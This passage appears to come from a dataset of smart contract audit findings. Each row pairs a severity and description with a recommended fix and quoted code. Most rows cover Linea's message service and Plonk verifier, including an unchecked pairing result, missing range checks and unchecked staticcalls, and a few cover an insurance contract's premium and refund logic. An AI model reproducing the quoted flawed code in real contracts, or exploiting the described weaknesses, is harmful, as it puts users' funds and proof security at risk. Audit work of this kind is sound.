timestamp `blockInfo.l2BlockTimestamp` should be greater or equal than the last L2 block timestamp and less or equal than the L1 block timestamp when `_finalizeBlocks` is executed. However the first check is missing, blocks with incorrect timestamp could be finalized, causing unintended system behavior\\n```\\nif (blockInfo.l2BlockTimestamp >= block.timestamp) {\\n revert BlockTimestampError();\\n}\\n```\\n",Add the missing timestamp check,,```\\nif (blockInfo.l2BlockTimestamp >= block.timestamp) {\\n revert BlockTimestampError();\\n}\\n```\\n +Rate Limiting Affecting the Usability and User's Funds Safety,medium,"In `claimMessage` of `L1MessageService` and `sendMessage` function of `L1MessageService` contract, function `_addUsedAmount` is used to rate limit the Ether amount (1000 Eth) sent from L2 to L1 in a time period (24 hours), this is problematic, usually user sends the funds to L1 when they need to exit from L2 to L1 especially when some security issues happened affecting their funds safety on L2, if there is a limit, the limit can be reached quickly by some whale sending large amount of Ether to L1, while other users cannot withdraw their funds to L1, putting their funds at risk. In addition, the limit can only be set and changed by the security council and security council can also pause message service at any time, blocking user withdraw funds from L2, this makes the L2->L1 message service more centralized.\\n```\\n\\_addUsedAmount(\\_fee + \\_value);\\n```\\n\\n```\\n\\_addUsedAmount(msg.value);\\n```\\n\\n```\\nfunction \\_addUsedAmount(uint256 \\_usedAmount) internal {\\n uint256 currentPeriodAmountTemp;\\n\\n if (currentPeriodEnd < block.timestamp) {\\n // Update period before proceeding\\n currentPeriodEnd = block.timestamp + periodInSeconds;\\n currentPeriodAmountTemp = \\_usedAmount;\\n } else {\\n currentPeriodAmountTemp = currentPeriodAmountInWei + \\_usedAmount;\\n }\\n\\n if (currentPeriodAmountTemp > limitInWei) {\\n revert RateLimitExceeded();\\n }\\n\\n currentPeriodAmountInWei = currentPeriodAmountTemp;\\n}\\n```\\n",Remove rate limiting for L2->L1 message service,,```\\n\\_addUsedAmount(\\_fee + \\_value);\\n```\\n +Front Running claimMessage on L1 and L2,medium,"The front-runner on L1 or L2 can front run the `claimMessage` transaction, as long as the `fee` is greater than the gas cost of the claiming the message and `feeRecipient` is not set, consequently the `fee` will be transferred to the message.sender(the front runner) once the message is claimed. As a result, postman would lose the incentive to deliver(claim) the message on the destination layer.\\n```\\nif (\\_fee > 0) {\\n address feeReceiver = \\_feeRecipient == address(0) ? msg.sender : \\_feeRecipient;\\n (bool feePaymentSuccess, ) = feeReceiver.call{ value: \\_fee }("""");\\n if (!feePaymentSuccess) {\\n revert FeePaymentFailed(feeReceiver);\\n }\\n```\\n\\n```\\nif (\\_fee > 0) {\\n address feeReceiver = \\_feeRecipient == address(0) ? msg.sender : \\_feeRecipient;\\n (bool feePaymentSuccess, ) = feeReceiver.call{ value: \\_fee }("""");\\n if (!feePaymentSuccess) {\\n revert FeePaymentFailed(feeReceiver);\\n }\\n}\\n```\\n",There are a few protections against front running including flashbots service. Another option to mitigate front running is to avoid using msg.sender and have user use the signed `claimMessage` transaction by the Postman to claim the message on the destination layer,,"```\\nif (\\_fee > 0) {\\n address feeReceiver = \\_feeRecipient == address(0) ? msg.sender : \\_feeRecipient;\\n (bool feePaymentSuccess, ) = feeReceiver.call{ value: \\_fee }("""");\\n if (!feePaymentSuccess) {\\n revert FeePaymentFailed(feeReceiver);\\n }\\n```\\n" +Contracts Not Well Designed for Upgrades,medium,"Inconsistent Storage Layout\\nThe Contracts introduce some buffer space in the storage layout to cope with the scenarios where new storage variables can be added if a need exists to upgrade the contracts to a newer version. This helps in reducing the chances of potential storage collisions. However, the storage layout concerning the buffer space is inconsistent, and multiple variations have been observed.\\n`PauseManager`, `RateLimitter`, and `MessageServiceBase` adds a buffer space of 10, contrary to other contracts which define the space as 50.\\n```\\nuint256[10] private \\_gap;\\n```\\n\\n```\\nuint256[10] private \\_gap;\\n```\\n\\n```\\nuint256[10] private \\_\\_base\\_gap;\\n```\\n\\n`L2MessageService` defines the buffer space prior to its existing storage variables.\\n```\\nuint256[50] private \\_\\_gap\\_L2MessageService;\\n```\\n\\nIf there exists a need to inherit from this contract in the future, the derived contract has to define the buffer space first, similar to `L2MessageService`. If it doesn't, `L2MessageService` can't have more storage variables. If it adds them, it will collide with the derived contract's storage slots.\\n2. `RateLimiter` and `MessageServiceBase` initializes values without the modifier `onlyInitializing`\\n```\\nfunction \\_\\_RateLimiter\\_init(uint256 \\_periodInSeconds, uint256 \\_limitInWei) internal {\\n```\\n\\n```\\nfunction \\_init\\_MessageServiceBase(address \\_messageService, address \\_remoteSender) internal {\\n```\\n\\nThe modifier `onlyInitializing` makes sure that the function should only be invoked by a function marked as `initializer`. However, it is absent here, which means these are normal internal functions that can be utilized in any other function, thus opening opportunities for errors.","Define a consistent storage layout. Consider a positive number `n` for the number of buffer space slots, such that, it is equal to any arbitrary number `d - No. of occupied storage slots`. For instance, if the arbitrary number is 50, and the contract has 20 occupied storage slots, the buffer space can be 50-20 = 30. It will maintain a consistent storage layout throughout the inheritance hierarchy.\\nFollow a consistent approach to defining buffer space. Currently, all the contracts, define the buffer space after their occupied storage slots, so it should be maintained in the `L2MessageService` as well.\\nDefine functions `__RateLimiter_init` and `_init_MessageServiceBase` as `onlyInitializing`.",,```\\nuint256[10] private \\_gap;\\n```\\n +Potential Code Corrections,low,"Function `_updateL1L2MessageStatusToReceived` and `addL1L2MessageHashes` allows status update for already received/sent/claimed messages.\\n```\\nfunction \\_updateL1L2MessageStatusToReceived(bytes32[] memory \\_messageHashes) internal {\\n uint256 messageHashArrayLength = \\_messageHashes.length;\\n\\n for (uint256 i; i < messageHashArrayLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n uint256 existingStatus = outboxL1L2MessageStatus[messageHash];\\n\\n if (existingStatus == INBOX\\_STATUS\\_UNKNOWN) {\\n revert L1L2MessageNotSent(messageHash);\\n }\\n\\n if (existingStatus != OUTBOX\\_STATUS\\_RECEIVED) {\\n outboxL1L2MessageStatus[messageHash] = OUTBOX\\_STATUS\\_RECEIVED;\\n }\\n\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessagesReceivedOnL2(\\_messageHashes);\\n}\\n```\\n\\n```\\nfunction addL1L2MessageHashes(bytes32[] calldata \\_messageHashes) external onlyRole(L1\\_L2\\_MESSAGE\\_SETTER\\_ROLE) {\\n uint256 messageHashesLength = \\_messageHashes.length;\\n\\n if (messageHashesLength > 100) {\\n revert MessageHashesListLengthHigherThanOneHundred(messageHashesLength);\\n }\\n\\n for (uint256 i; i < messageHashesLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n if (inboxL1L2MessageStatus[messageHash] == INBOX\\_STATUS\\_UNKNOWN) {\\n inboxL1L2MessageStatus[messageHash] = INBOX\\_STATUS\\_RECEIVED;\\n }\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessageHashesAddedToInbox(\\_messageHashes);\\n```\\n\\nIt may trigger false alarms, as they will still be a part of `L1L2MessagesReceivedOnL2` and `L1L2MessageHashesAddedToInbox`.\\n`_updateL1L2MessageStatusToReceived` checks the status of L1->L2 messages as:\\n```\\nif (existingStatus == INBOX\\_STATUS\\_UNKNOWN) {\\n revert L1L2MessageNotSent(messageHash);\\n}\\n```\\n\\nHowever, the status is need to be checked with `OUTBOX_STATUS_UNKNOWN` instead of `INBOX_STATUS_UNKNOWN` as it is an outbox message. This creates a hindrance in the code readability and should be fixed.\\nArray `timestampHashes` stores `l2BlockTimestamp` as integers, contrary to the hashes that the variable name states.\\n```\\ntimestampHashes[i] = blockInfo.l2BlockTimestamp;\\n```\\n\\nUnused error declaration\\n```\\n \\* dev Thrown when the decoding action is invalid.\\n \\*/\\n\\nerror InvalidAction();\\n```\\n\\nTransactionDecoder defines an error as `InvalidAction` which is supposed to be thrown when the decoding action is invalid, as stated in NATSPEC comment. However, it is currently unutilized.","Only update the status for sent messages in `_updateL1L2MessageStatusToReceived`, and unknown messages in `addL1L2MessageHashes` and revert otherwise, to avoid off-chain accounting errors.\\nCheck the status of L1->L2 sent message with `OUTBOX_STATUS_UNKNOWN` to increase code readability.\\nEither store timestamp hashes in the variable `timestampHashes` or update the variable name likewise.\\nRemove the error declaration if it is not serving any purpose.",,```\\nfunction \\_updateL1L2MessageStatusToReceived(bytes32[] memory \\_messageHashes) internal {\\n uint256 messageHashArrayLength = \\_messageHashes.length;\\n\\n for (uint256 i; i < messageHashArrayLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n uint256 existingStatus = outboxL1L2MessageStatus[messageHash];\\n\\n if (existingStatus == INBOX\\_STATUS\\_UNKNOWN) {\\n revert L1L2MessageNotSent(messageHash);\\n }\\n\\n if (existingStatus != OUTBOX\\_STATUS\\_RECEIVED) {\\n outboxL1L2MessageStatus[messageHash] = OUTBOX\\_STATUS\\_RECEIVED;\\n }\\n\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessagesReceivedOnL2(\\_messageHashes);\\n}\\n```\\n +TransactionDecoder Does Not Account for the Missing Elements While Decoding a Transaction,low,"The library tries to decode calldata from different transaction types, by jumping to the position of calldata element in the rlp encoding. These positions are:\\nEIP1559: 8\\nEIP2930: 7\\nLegacy: 6\\n```\\ndata = it.\\_skipTo(8).\\_toBytes();\\n```\\n\\n```\\ndata = it.\\_skipTo(7).\\_toBytes();\\n```\\n\\n```\\ndata = it.\\_skipTo(6).\\_toBytes();\\n```\\n\\nHowever, the decoder doesn't check whether the required element is there or not in the encoding provided.\\nThe decoder uses the library RLPReader to skip to the desired element in encoding. However, it doesn't revert in case there are not enough elements to skip to, and will simply return byte `0x00`, while still completing unnecessary iterations.\\n```\\nfunction \\_skipTo(Iterator memory \\_self, uint256 \\_skipToNum) internal pure returns (RLPItem memory item) {\\n uint256 ptr = \\_self.nextPtr;\\n uint256 itemLength = \\_itemLength(ptr);\\n \\_self.nextPtr = ptr + itemLength;\\n\\n for (uint256 i; i < \\_skipToNum - 1; ) {\\n ptr = \\_self.nextPtr;\\n itemLength = \\_itemLength(ptr);\\n \\_self.nextPtr = ptr + itemLength;\\n\\n unchecked {\\n i++;\\n }\\n }\\n\\n item.len = itemLength;\\n item.memPtr = ptr;\\n}\\n```\\n\\nAlthough it doesn't impose any security issue, as `ZkEvmV2` tries to decode an array of bytes32 hashes from the rlp encoded transaction. However, it may still lead to errors in other use cases if not handled correctly.\\n```\\nCodecV2.\\_extractXDomainAddHashes(TransactionDecoder.decodeTransaction(\\_transactions[\\_batchReceptionIndices[i]]))\\n```\\n",rlp library should revert if there are not enough elements to skip to in the encoding.,,```\\ndata = it.\\_skipTo(8).\\_toBytes();\\n```\\n +Incomplete Message State Check When Claiming Messages on L1 and L2,low,"When claiming message on L1 orL2, `_updateL2L1MessageStatusToClaimed` and `_updateL1L2MessageStatusToClaimed` are called to update the message status, however the message state check only checks status `INBOX_STATUS_RECEIVED` and is missing status `INBOX_STATUS_UNKNOWN`, which means the message is not picked up by the coordinator or the message is not sent on L1 or L2 and should be reverted. As a result, the claiming message could be reverted with a incorrect reason.\\n```\\nfunction \\_updateL2L1MessageStatusToClaimed(bytes32 \\_messageHash) internal {\\n if (inboxL2L1MessageStatus[\\_messageHash] != INBOX\\_STATUS\\_RECEIVED) {\\n revert MessageAlreadyClaimed();\\n }\\n\\n delete inboxL2L1MessageStatus[\\_messageHash];\\n\\n emit L2L1MessageClaimed(\\_messageHash);\\n}\\n```\\n\\n```\\n function \\_updateL1L2MessageStatusToClaimed(bytes32 \\_messageHash) internal {\\n if (inboxL1L2MessageStatus[\\_messageHash] != INBOX\\_STATUS\\_RECEIVED) {\\n revert MessageAlreadyClaimed();\\n }\\n\\n inboxL1L2MessageStatus[\\_messageHash] = INBOX\\_STATUS\\_CLAIMED;\\n\\n emit L1L2MessageClaimed(\\_messageHash);\\n }\\n}\\n```\\n",Add the missing status check and relevant revert reason for status `INBOX_STATUS_UNKNOWN`,,```\\nfunction \\_updateL2L1MessageStatusToClaimed(bytes32 \\_messageHash) internal {\\n if (inboxL2L1MessageStatus[\\_messageHash] != INBOX\\_STATUS\\_RECEIVED) {\\n revert MessageAlreadyClaimed();\\n }\\n\\n delete inboxL2L1MessageStatus[\\_messageHash];\\n\\n emit L2L1MessageClaimed(\\_messageHash);\\n}\\n```\\n +Events Which May Trigger False Alarms,low,"1- `PauseManager` allows `PAUSE_MANAGER_ROLE` to pause/unpause a type as:\\n```\\nfunction pauseByType(bytes32 \\_pauseType) external onlyRole(PAUSE\\_MANAGER\\_ROLE) {\\n pauseTypeStatuses[\\_pauseType] = true;\\n emit Paused(\\_msgSender(), \\_pauseType);\\n}\\n```\\n\\n```\\nfunction unPauseByType(bytes32 \\_pauseType) external onlyRole(PAUSE\\_MANAGER\\_ROLE) {\\n pauseTypeStatuses[\\_pauseType] = false;\\n emit UnPaused(\\_msgSender(), \\_pauseType);\\n}\\n```\\n\\nHowever, the functions don't check whether the given `_pauseType` has already been paused/unpaused or not and emits an event every time called. This may trigger false alarms for off-chain monitoring tools and may cause unnecessary panic.\\n2 - `RateLimitter` allows resetting the limit and used amount as:\\n```\\nfunction resetRateLimitAmount(uint256 \\_amount) external onlyRole(RATE\\_LIMIT\\_SETTER\\_ROLE) {\\n bool amountUsedLoweredToLimit;\\n\\n if (\\_amount < currentPeriodAmountInWei) {\\n currentPeriodAmountInWei = \\_amount;\\n amountUsedLoweredToLimit = true;\\n }\\n\\n limitInWei = \\_amount;\\n\\n emit LimitAmountChange(\\_msgSender(), \\_amount, amountUsedLoweredToLimit);\\n}\\n```\\n\\n```\\nfunction resetAmountUsedInPeriod() external onlyRole(RATE\\_LIMIT\\_SETTER\\_ROLE) {\\n currentPeriodAmountInWei = 0;\\n\\n emit AmountUsedInPeriodReset(\\_msgSender());\\n}\\n```\\n\\nHowever, it doesn't account for the scenarios where the function can be called after the current period ends and before a new period gets started. As the `currentPeriodAmountInWei` will still be holding the used amount of the last period, if the `RATE_LIMIT_SETTER_ROLE` tries to reset the limit with the lower value than the used amount, the function will emit the same event `LimitAmountChange` with the flag `amountUsedLoweredToLimit`.\\nAdding to it, the function will make `currentPeriodAmountInWei` = `limitInWei`, which means no more amount can be added as the used amount until the used amount is manually reset to 0, which points out to the fact that the used amount should be automatically reset, once the current period ends. Although it is handled automatically in function `_addUsedAmount`, however, if the new period has not yet started, it is supposed to be done in a 2-step approach i.e., first, reset the used amount and then the limit. It can be simplified by checking for the current period in the `resetRateLimitAmount` function itself.\\nThe same goes for the scenario where the used amount is reset after the current period ends. It will emit the same event as `AmountUsedInPeriodReset`\\nThese can create unnecessary confusion, as the events emitted don't consider the abovementioned scenarios.","Consider adding checks to make sure already paused/unpaused types don't emit respective events.\\nConsider emitting different events, or adding a flag in the events, that makes it easy to differentiate whether the limit and used amount are reset in the current period or after it has ended.\\nReset `currentPeriodAmountInWei` in function `resetRateLimitAmount` itself if the current period has ended.",,"```\\nfunction pauseByType(bytes32 \\_pauseType) external onlyRole(PAUSE\\_MANAGER\\_ROLE) {\\n pauseTypeStatuses[\\_pauseType] = true;\\n emit Paused(\\_msgSender(), \\_pauseType);\\n}\\n```\\n" +No Proper Trusted Setup Acknowledged,high,"Linea uses Plonk proof system, which needs a preprocessed CRS (Common Reference String) for proving and verification, the Plonk system security is based on the existence of a trusted setup ceremony to compute the CRS, the current verifier uses a CRS created by one single party, which requires fully trust of the party to delete the toxic waste (trapdoor) which can be used to generate forged proof, undermining the security of the entire system\\n```\\nuint256 constant g2\\_srs\\_0\\_x\\_0 = 11559732032986387107991004021392285783925812861821192530917403151452391805634;\\nuint256 constant g2\\_srs\\_0\\_x\\_1 = 10857046999023057135944570762232829481370756359578518086990519993285655852781;\\nuint256 constant g2\\_srs\\_0\\_y\\_0 = 4082367875863433681332203403145435568316851327593401208105741076214120093531;\\nuint256 constant g2\\_srs\\_0\\_y\\_1 = 8495653923123431417604973247489272438418190587263600148770280649306958101930;\\n\\nuint256 constant g2\\_srs\\_1\\_x\\_0 = 18469474764091300207969441002824674761417641526767908873143851616926597782709;\\nuint256 constant g2\\_srs\\_1\\_x\\_1 = 17691709543839494245591259280773972507311536864513996659348773884770927133474;\\nuint256 constant g2\\_srs\\_1\\_y\\_0 = 2799122126101651639961126614695310298819570600001757598712033559848160757380;\\nuint256 constant g2\\_srs\\_1\\_y\\_1 = 3054480525781015242495808388429905877188466478626784485318957932446534030175;\\n```\\n",Conduct a proper MPC to generate CRS like the Powers of Tau MPC or use a trustworthy CRS generated by an exisiting audited trusted setup like Aztec's ignition,,```\\nuint256 constant g2\\_srs\\_0\\_x\\_0 = 11559732032986387107991004021392285783925812861821192530917403151452391805634;\\nuint256 constant g2\\_srs\\_0\\_x\\_1 = 10857046999023057135944570762232829481370756359578518086990519993285655852781;\\nuint256 constant g2\\_srs\\_0\\_y\\_0 = 4082367875863433681332203403145435568316851327593401208105741076214120093531;\\nuint256 constant g2\\_srs\\_0\\_y\\_1 = 8495653923123431417604973247489272438418190587263600148770280649306958101930;\\n\\nuint256 constant g2\\_srs\\_1\\_x\\_0 = 18469474764091300207969441002824674761417641526767908873143851616926597782709;\\nuint256 constant g2\\_srs\\_1\\_x\\_1 = 17691709543839494245591259280773972507311536864513996659348773884770927133474;\\nuint256 constant g2\\_srs\\_1\\_y\\_0 = 2799122126101651639961126614695310298819570600001757598712033559848160757380;\\nuint256 constant g2\\_srs\\_1\\_y\\_1 = 3054480525781015242495808388429905877188466478626784485318957932446534030175;\\n```\\n +Missing Verifying Paring Check Result,high,"In function `batch_verify_multi_points`, the SNARK paring check is done by calling paring pre-compile `let l_success := staticcall(sub(gas(), 2000),8,mPtr,0x180,0x00,0x20)` and the only the execution status is stored in the final success state (state_success), but the the paring check result which is stored in 0x00 is not stored and checked, which means if the paring check result is 0 (pairing check failed), the proof would still pass verification, e.g. invalid proof with incorrect proof element `proof_openings_selector_commit_api_at_zeta` would pass the paring check. As a result it breaks the SNARK paring verification.\\n```\\nlet l\\_success := staticcall(sub(gas(), 2000),8,mPtr,0x180,0x00,0x20)\\n// l\\_success := true\\nmstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n```\\n\\nAnother example is, if either of the following is sent as a point at infinity or (0,0) as (x,y) co-ordinate:\\ncommitment to the opening proof polynomial Wz\\ncommitment to the opening proof polynomial Wzw\\nThe proof will still work, since the pairing result is not being checked.",Verify paring check result and store it in the final success state after calling the paring pre-compile,,"```\\nlet l\\_success := staticcall(sub(gas(), 2000),8,mPtr,0x180,0x00,0x20)\\n// l\\_success := true\\nmstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n```\\n" +"Gas Greifing and Missing Return Status Check for staticcall(s), May Lead to Unexpected Outcomes Partially Addressed",high,"The gas supplied to the staticcall(s), is calculated by subtracting `2000` from the remaining gas at this point in time. However, if not provided enough gas, the staticcall(s) may fail and there will be no return data, and the execution will continue with the stale data that was previously there at the memory location specified by the return offset with the staticcall(s).\\n1- Predictable Derivation of Challenges\\nThe function `derive_gamma_beta_alpha_zeta` is used to derive the challenge values `gamma`, `beta`, `alpha`, `zeta`. These values are derived from the prover's transcript by hashing defined parameters and are supposed to be unpredictable by either the prover or the verifier. The hash is collected with the help of SHA2-256 precompile. The values are considered unpredictable, due to the assumption that SHA2-256 acts as a random oracle and it would be computationally infeasible for an attacker to find the pre-image of `gamma`. However, the assumption might be wrong.\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1b), size, mPtr, 0x20)) //0x1b -> 000..""gamma""\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1c), 0x24, mPtr, 0x20)) //0x1b -> 000..""gamma""\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1b), 0x65, mPtr, 0x20)) //0x1b -> 000..""gamma""\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1c), 0xe4, mPtr, 0x20))\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr,start\\_input), size\\_input, add(state, state\\_gamma\\_kzg), 0x20))\\n```\\n\\nIf the staticcall(s) fails, it will make the challenge values to be predictable and may help the prover in forging proofs and launching other adversarial attacks.\\n2- Incorrect Exponentiation\\nFunctions `compute_ith_lagrange_at_z`, `compute_pi`, and `verify` compute modular exponentiation by making a `staticcall` to the precompile `modexp` as:\\n```\\npop(staticcall(sub(gas(), 2000),0x05,mPtr,0xc0,0x00,0x20))\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000),0x05,mPtr,0xc0,mPtr,0x20))\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000),0x05,mPtr,0xc0,mPtr,0x20))\\n```\\n\\nHowever, if not supplied enough gas, the staticcall(s) will fail, thus returning no result and the execution will continue with the stale data.\\n3. Incorrect Point Addition and Scalar Multiplication\\n```\\npop(staticcall(sub(gas(), 2000),7,folded\\_evals\\_commit,0x60,folded\\_evals\\_commit,0x40))\\n```\\n\\n```\\nlet l\\_success := staticcall(sub(gas(), 2000),6,mPtr,0x80,dst,0x40)\\n```\\n\\n```\\nlet l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,dst,0x40)\\n```\\n\\n```\\nlet l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,mPtr,0x40)\\n```\\n\\n```\\nl\\_success := and(l\\_success, staticcall(sub(gas(), 2000),6,mPtr,0x80,dst, 0x40))\\n```\\n\\nFor the same reason, `point_add`, `point_mul`, and `point_acc_mul` will return incorrect results. Matter of fact, `point_acc_mul` will not revert even if the scalar multiplication fails in the first step. Because, the memory location specified for the return offset, will still be containing the old (x,y) coordinates of `src`, which are points on the curve. Hence, it will proceed by incorrectly adding (x,y) coordinates of `dst` with it.\\nHowever, it will not be practically possible to conduct a gas griefing attack for staticcall(s) at the start of the top-level transaction. As it will require an attacker to pass a very low amount of gas to make the `staticcall` fail, but at the same time, that would not be enough to make the top-level transaction execute entirely and not run out of gas. But, this can still be conducted for the staticcall(s) that are executed at the near end of the top-level transaction.","Check the returned status of the staticcall and revert if any of the staticcall's return status has been 0.\\nAlso fix the comments mentioned for every staticcall, for instance: the function `derive_beta` says `0x1b -> 000..""gamma""` while the memory pointer holds the ASCII value of string `beta`",,"```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1b), size, mPtr, 0x20)) //0x1b -> 000..""gamma""\\n```\\n" +Missing Scalar Field Range Check in Scalar Multiplication,high,"There is no field element range check on scalar field proof elements e.g. `proof_l_at_zeta, proof_r_at_zeta, proof_o_at_zeta, proof_s1_at_zeta,proof_s2_at_zeta, proof_grand_product_at_zeta_omega` as mentioned in the step 2 of the verifier's algorithm in the Plonk paper. The scalar multiplication functions `point_mul` and `point_acc_mul` call precompile ECMUL, according to EIP-169 , which would verify the point P is on curve and P.x and P.y is less than the base field modulus, however it doesn't check the scalar `s` is less than scalar field modulus, if `s` is greater than scalar field modulus `r_mod`, it would cause unintended behavior of the contract, specifically if the scalar field proof element `e` are replaced by `e` + `r_mod`, the proof would still pass verification. Although in Plonk's case, there is few attacker vectors could exists be based on this kind of proof malleability.\\n```\\nfunction point\\_mul(dst,src,s, mPtr) {\\n // let mPtr := add(mload(0x40), state\\_last\\_mem)\\n let state := mload(0x40)\\n mstore(mPtr,mload(src))\\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\\n mstore(add(mPtr,0x40),s)\\n let l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,dst,0x40)\\n mstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n}\\n\\n// dst <- dst + [s]src (Elliptic curve)\\nfunction point\\_acc\\_mul(dst,src,s, mPtr) {\\n let state := mload(0x40)\\n mstore(mPtr,mload(src))\\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\\n mstore(add(mPtr,0x40),s)\\n let l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,mPtr,0x40)\\n mstore(add(mPtr,0x40),mload(dst))\\n mstore(add(mPtr,0x60),mload(add(dst,0x20)))\\n l\\_success := and(l\\_success, staticcall(sub(gas(), 2000),6,mPtr,0x80,dst, 0x40))\\n mstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n}\\n```\\n",Add scalar field range check on scalar multiplication functions `point_mul` and `point_acc_mul` or the scalar field proof elements.,,"```\\nfunction point\\_mul(dst,src,s, mPtr) {\\n // let mPtr := add(mload(0x40), state\\_last\\_mem)\\n let state := mload(0x40)\\n mstore(mPtr,mload(src))\\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\\n mstore(add(mPtr,0x40),s)\\n let l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,dst,0x40)\\n mstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n}\\n\\n// dst <- dst + [s]src (Elliptic curve)\\nfunction point\\_acc\\_mul(dst,src,s, mPtr) {\\n let state := mload(0x40)\\n mstore(mPtr,mload(src))\\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\\n mstore(add(mPtr,0x40),s)\\n let l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,mPtr,0x40)\\n mstore(add(mPtr,0x40),mload(dst))\\n mstore(add(mPtr,0x60),mload(add(dst,0x20)))\\n l\\_success := and(l\\_success, staticcall(sub(gas(), 2000),6,mPtr,0x80,dst, 0x40))\\n mstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n}\\n```\\n" +Missing Public Inputs Range Check,high,"The public input is an array of `uint256` numbers, there is no check if each public input is less than SNARK scalar field modulus `r_mod`, as mentioned in the step 3 of the verifier's algorithm in the Plonk paper. Since public inputs are involved computation of `Pi` in the plonk gate which is in the SNARK scalar field, without the check, it might cause scalar field overflow and the verification contract would fail and revert. To prevent overflow and other unintended behavior there should be a range check for the public inputs.\\n```\\nfunction Verify(bytes memory proof, uint256[] memory public\\_inputs)\\n```\\n\\n```\\nsum\\_pi\\_wo\\_api\\_commit(add(public\\_inputs,0x20), mload(public\\_inputs), zeta)\\npi := mload(mload(0x40))\\n\\nfunction sum\\_pi\\_wo\\_api\\_commit(ins, n, z) {\\n let li := mload(0x40)\\n batch\\_compute\\_lagranges\\_at\\_z(z, n, li)\\n let res := 0\\n let tmp := 0\\n for {let i:=0} lt(i,n) {i:=add(i,1)}\\n {\\n tmp := mulmod(mload(li), mload(ins), r\\_mod)\\n res := addmod(res, tmp, r\\_mod)\\n li := add(li, 0x20)\\n ins := add(ins, 0x20)\\n }\\n mstore(mload(0x40), res)\\n}\\n```\\n","Add range check for the public inputs `require(input[i] < r_mod, ""public inputs greater than snark scalar field"");`",,"```\\nfunction Verify(bytes memory proof, uint256[] memory public\\_inputs)\\n```\\n" +Loading Arbitrary Data as Wire Commitments Acknowledged,medium,"Function `load_wire_commitments_commit_api` as the name suggests, loads wire commitments from the proof into the memory array `wire_commitments`. The array is made to hold 2 values per commitment or the size of the array is 2 * `vk_nb_commitments_commit_api`, which makes sense as these 2 values are the x & y co-ordinates of the commitments.\\n```\\nuint256[] memory wire\\_committed\\_commitments = new uint256[](2\\*vk\\_nb\\_commitments\\_commit\\_api);\\nload\\_wire\\_commitments\\_commit\\_api(wire\\_committed\\_commitments, proof);\\n```\\n\\nComing back to the functionload_wire_commitments_commit_api, it extracts both the x & y coordinates of a commitment in a single iteration. However, the loop runs `2 * vk_nb_commitments_commit_api`, or in other words, twice as many of the required iterations. For instance, if there is 1 commitment, it will run two times. The first iteration will pick up the actual coordinates and the second one can pick any arbitrary data from the proof(if passed) and load it into memory. Although, this data which has been loaded in an extra iteration seems harmless but still adds an overhead for the processing.\\n```\\nfor {let i:=0} lt(i, mul(vk\\_nb\\_commitments\\_commit\\_api,2)) {i:=add(i,1)}\\n```\\n","The number of iterations should be equal to the size of commitments, i.e., `vk_nb_commitments_commit_api`. So consider switching from:\\n```\\nfor {let i:=0} lt(i, mul(vk_nb_commitments_commit_api,2)) {i:=add(i,1)}\\n```\\n\\nto:\\n```\\nfor {let i:=0} lt(i, vk_nb_commitments_commit_api) {i:=add(i,1)}\\n```\\n",,"```\\nuint256[] memory wire\\_committed\\_commitments = new uint256[](2\\*vk\\_nb\\_commitments\\_commit\\_api);\\nload\\_wire\\_commitments\\_commit\\_api(wire\\_committed\\_commitments, proof);\\n```\\n" +Makefile: Target Order,low,"The target `all` in the Makefile ostensibly wants to run the targets `clean` and `solc` in that order.\\n```\\nall: clean solc\\n```\\n\\nHowever prerequisites in GNU Make are not ordered, and they might even run in parallel. In this case, this could cause spurious behavior like overwrite errors or files being deleted just after being created.",The Make way to ensure that targets run one after the other is\\n```\\nall: clean\\n $(MAKE) solc\\n```\\n\\nAlso `all` should be listed in the PHONY targets.,,```\\nall: clean solc\\n```\\n +addPremium - A back runner may cause an insurance holder to lose their refunds by calling addPremium right after the original call,high,"`addPremium` is a public function that can be called by anyone and that distributes the weekly premium payments to the pool manager and the rest of the pool share holders. If the collateral deposited is not enough to cover the total coverage offered to insurance holders for a given week, refunds are allocated pro rata for all insurance holders of that particular week and policy. However, in the current implementation, attackers can call `addPremium` right after the original call to `addPremium` but before the call to refund; this will cause the insurance holders to lose their refunds, which will be effectively locked forever in the contract (unless the contract is upgraded).\\n```\\nrefundMap[policyIndex\\_][week] = incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\n",`addPremium` should contain a validation check in the beginning of the function that reverts for the case of `incomeMap[policyIndex_][week] = 0`.,,```\\nrefundMap[policyIndex\\_][week] = incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\n +refund - attacker can lock insurance holder's refunds by calling refund before a refund was allocated,high,"`addPremium` is used to determine the `refund` amount that an insurance holder is eligible to claim. The amount is stored in the `refundMap` mapping and can then later be claimed by anyone on behalf of an 